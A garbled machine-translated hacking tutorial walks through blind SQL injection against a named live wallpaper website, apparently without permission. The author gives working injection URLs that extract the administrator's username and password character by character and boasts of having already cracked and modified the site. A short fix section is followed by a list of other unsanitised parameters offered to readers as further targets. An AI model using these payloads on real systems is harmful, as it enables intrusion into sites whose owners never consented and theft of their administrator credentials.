How to crack the ultimate desktop program

Author: safer source: cnwill.com

After cnwill.com has been updated recently, I went on a leisurely online tour and visited a friend I met when I first got online. Http://developer.hdskin.com/site is beautiful
I am going to use the code to create the image area of our dormitory. However, he only provides V1.1 [v1.1http: // chinaz.com/download/software.asp? SOFTWAREID = 8163]
If the latest v1.2. version is not provided, I would like to test whether the Code has the SQL Injection vulnerability.

Guess
Download the v1.1 code first. I guess v1.2 is better than V1.1, and the main structure will not change.
First, test list. asp, because according to experience, *. asp? Xx = * scripts contain vulnerabilities.
Http://desk.hdskin.com/list.asp? Id = 1345 and 1 = 1 is displayed normally
Http://desk.hdskin.com/list.asp? Id = 1345 and 1 = 2: "You have not selected the wallpaper. Please return"
It seems that there is a problem. You can see the V1.1 code just now.
The code in list. asp can easily find problematic statements.
Code:

--------------------------------------------------------------------------------
 

SQL = "select Dclass. class, DNclass. Nclass, download. showname, download. classid, download. Nclassid, download. lasthits
From download, Dclass, DNclass where download. classid = Dclass. classid and download. Nclassid = DNclass. Nclassid
And download. ID = "& request (" id ")
 

--------------------------------------------------------------------------------
 

Request ("id") has not been processed. It is a good opportunity. Wish me a good luck, too. Hahahaha.
Review the table name and column name of the database in V1.1. The Administrator information is stored in admin. The username is used to manage the password and set the flag permission.
(If flag is set to 1, it is the highest administrator, and if it is set to 2, it is the general administrator)
First, test the http://desk.hdskin.com/list.asp? Id = 1: whether the display is normal. If the display is normal, use the following statement to guess.
Code:

--------------------------------------------------------------------------------
 

Http://desk.hdskin.com/list.asp? Id = (select min (id) from admin where left (password, 1) = c and id = 1)
 

--------------------------------------------------------------------------------
 

If it cannot be properly displayed, use the following statement to guess
Code:

--------------------------------------------------------------------------------
 

Http://desk.hdskin.com/list.asp? Id = 1345 and exists (select min (id) from admin where left (password, 1) = c and id = 1)
 

--------------------------------------------------------------------------------
 

Let's talk about the guessing skills.

Min (id) is the minimum ID. You can also change it to max (id). and id = 1, which is the id number of the Administrator in the admin table. Left is the left-side password of the password column,
Right is the right-side password of the password column. Based on experience, it is best to start work on the left and right, so that the guess speed is faster!
First, let's guess the username and password length of the Administrator with ID = 1.
Guess User Name
Http://desk.hdskin.com/list.asp? Id = (select min (id) from admin where len (username) = 8 and id = 1)
Guess User Name
Http://desk.hdskin.com/list.asp? Id = (select min (id) from admin where len (password) = 6 and id = 1) Guess the management password
Check whether the admin has the sniper user name.
Http://desk.hdskin.com/list.asp? Id = 1345 and sniper = (select username from admin where username = sniper)

Next, we started to use the software written by ruder to guess the password. It was too painful to manually guess the password.
The user password is guessed as a column.
URL: Write
Http://desk.hdskin.com/list.asp? Id = 1345 and exists (select min (id) from admin where left (password, 1) = % c)
Feature string: Click the feature string on the page to check whether the page can be accessed normally. (If the page can be accessed, the name and password are correct)
Assume that the First password is S.
Then change URL: To http://desk.hdskin.com/list.asp? Id = 1345 and exists (select min (id) from admin where left (password, 2) = S % c)
Assume that the second password is.
Change URL: To http://desk.hdskin.com/list.asp? Id = 1345 and exists (select min (id) from admin where left (password, 3) = SA % c)
Username and so on. Just give it a guess! Figure 1.gif]

Let me talk about how to fix the vulnerability.

After I cracked and modified the website last week, the webmaster added some patches on his own.
Code:

--------------------------------------------------------------------------------
 

If request ("id") = "" then
Response. write "You have not selected the wallpaper. Please return"
Response. end
End if
Set rs = server. createobject ("adodb. recordset ")
SQL = "select Dclass. class, DNclass. Nclass, download. showname, download. classid, download. Nclassid, download. lasthits
From download, Dclass, DNclass where download. classid = Dclass. classid and download. Nclassid = DNclass. Nclassid
And download. ID = "& request (" id ")
 

--------------------------------------------------------------------------------
 

He probably thought this would block me!
Code in list. asp
Code:

--------------------------------------------------------------------------------
 

Set rs = server. createobject ("adodb. recordset ")
SQL = "select Dclass. class, DNclass. Nclass, download. showname, download. classid, download. Nclassid, download. lasthits
From download, Dclass, DNclass where download. classid = Dclass. classid and download. Nclassid = DNclass. Nclassid and
Download. ID = "& request (" id ")
Rs. open SQL, conn, 1, 1
SQL = "select * from Dvote where downid =" & request ("id") & "order by id desc"
 

--------------------------------------------------------------------------------
 

Change
Code:

--------------------------------------------------------------------------------
 

Dim idid
Idid = replace (request ("id "),"","")
If isnumeric (idid) = 0 or idid = "" then
Response. write "Well, what do you want? I'm safer! "
Response. end
End if
Set rs = server. createobject ("adodb. recordset ")
SQL = "select Dclass. class, DNclass. Nclass, download. showname, download. classid, download. Nclassid, download. lasthits
From download, Dclass, DNclass where download. classid = Dclass. classid and download. Nclassid = DNclass. Nclassid and
Download. ID = "& idid
Rs. open SQL, conn, 1, 1
SQL = "select * from Dvote where downid =" & idid & "order by id desc"
[Idid is limited. Only numbers can be entered.]
 

--------------------------------------------------------------------------------
 

-------------------------------------------------------------------------------
Next, let's take a look at other issues on his site.
Pai_news.asp
Rs. open SQL, conn, 1, 3
SQL = "select Aclass. class, ANclass. Nclass, article. title, article. classid, article. Nclassid from article, Aclass, ANclass
Where article. classid = Aclass. classid and article. Nclassid = ANclass. Nclassid and article. articleID = "& request (" id ")
Rs. open SQL, conn, 1, 1
Request ("id") is still not processed. Please follow the above instructions to enlarge and test it yourself.
-------------------------------------------------------------------------------
Fenlei. asp and News_index
Classid = request ("classid ")
Request ("id") is still not processed.
Http://desk.hdskin.com/fenlei.asp? Classid = 3 and exists (select id from admin where flag = 1) normal access, it indicates there is a vulnerability!
-------------------------------------------------------------------------------
VOTE. asp
SQL = "select * from Dvote where downid =" & request ("id") & "order by id desc"
Downid not processed
-------------------------------------------------------------------------------
QUERY. asp
Nclassid = "Nclassid =" & cstr (request ("Nclassid") & "and"
Nclassid is not processed.
-------------------------------------------------------------------------------
It's a rough look